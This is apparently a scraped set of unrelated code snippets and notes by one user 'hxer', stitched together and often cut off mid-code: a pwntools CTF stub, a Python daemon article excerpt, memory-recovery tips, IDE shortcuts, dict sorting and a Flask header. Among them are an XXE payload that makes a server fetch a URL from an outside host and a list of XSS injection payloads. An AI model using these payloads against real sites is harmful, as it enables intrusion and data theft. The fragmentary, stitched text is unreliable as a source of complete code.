hxer

# -*- coding: utf-8 -*-

from pwn import *

context.arch = 'i386'
context.word_size = 32
context.log_level = 'debug'

exe = './passcode'

hxer

--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

hxer

A simple unix/linux daemon in Python

Source: http://www.jejik.com/articles/2007/02/a_simple_unix_linux_daemon_in_python/

Access: http://web.archive.org/web/20131025230048/http://www.jejik.com/articles/2007/02/a_simple_unix_linux_daemon_in_python/

by Sander Marechal

I've written a simple Python class for creating daemons on unix/linux systems. It was pieced together for various other examples, mostly corrections to various Python Cookbook articles and a couple of examples posted to the Python mailing lists. It has support for a pidfile to keep track of the process. I hope it's useful to someone.

hxer

%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">

hxer

# from __future__ import division

# def_op('STOP_CODE', 0)
# ignore

# def_op('POP_TOP', 1)
a()

# def_op('ROT_TWO', 2)
(a, b) = (b, a)

hxer

How to recover lost Python source code if it's still resident in-memory

I screwed up using git ("git checkout --" on the wrong file) and managed to delete the code I had just written... but it was still running in a process in a docker container. Here's how I got it back, using https://pypi.python.org/pypi/pyrasite/ and https://pypi.python.org/pypi/uncompyle6

Attach a shell to the docker container

Install GDB (needed by pyrasite)

apt-get update && apt-get install gdb

hxer

<div class="container">
    <div class="row">
        <div class="col-md-6 col-center-block">
            <form class="form-inline" >
                <div class="form-group ">
                    <select name="type" class="form-control">
                        <option value=""></option>
                        <option value=""></option>
                        <option value=""></option>
                        <option value=""></option>

hxer

快捷键：

ctrl+tab:         switcher,在已打开文件之间或者工具窗口间切换
alt+alt:          连续两次快速按下alt键不放，显示tool windows（project,database ...)
ctrl+k:           快速调用 commit changes 对话框
alt+F3:           显示搜索窗格，对当前文件进行搜索，然后配合ctrl+alt+r,可以进行替换操作
ctrl+shift+f:     find in path 在指定文件夹或者整个project内搜索，ctrl+shift+r进行替换操作
ctrl+shift+alt+t: 快速rename，里面有好几个选项，慢慢理解吧
shift+F6:         rename，自动重命名该变量所有被调用的地方

hxer

count = {'a': 1, 'c':4, 'g': 2}

sort_list = sorted(count.items(), key=lambda d: d[1], reverse=True)


from operator import itemgetter
sort_list = sorted(count.items(), key=itemgetter(1), reverse=True)

hxer

# -*- coding: utf-8 -*-

"""

"""

import functools
from flask import Flask, jsonify
from gevent.pywsgi import WSGIServer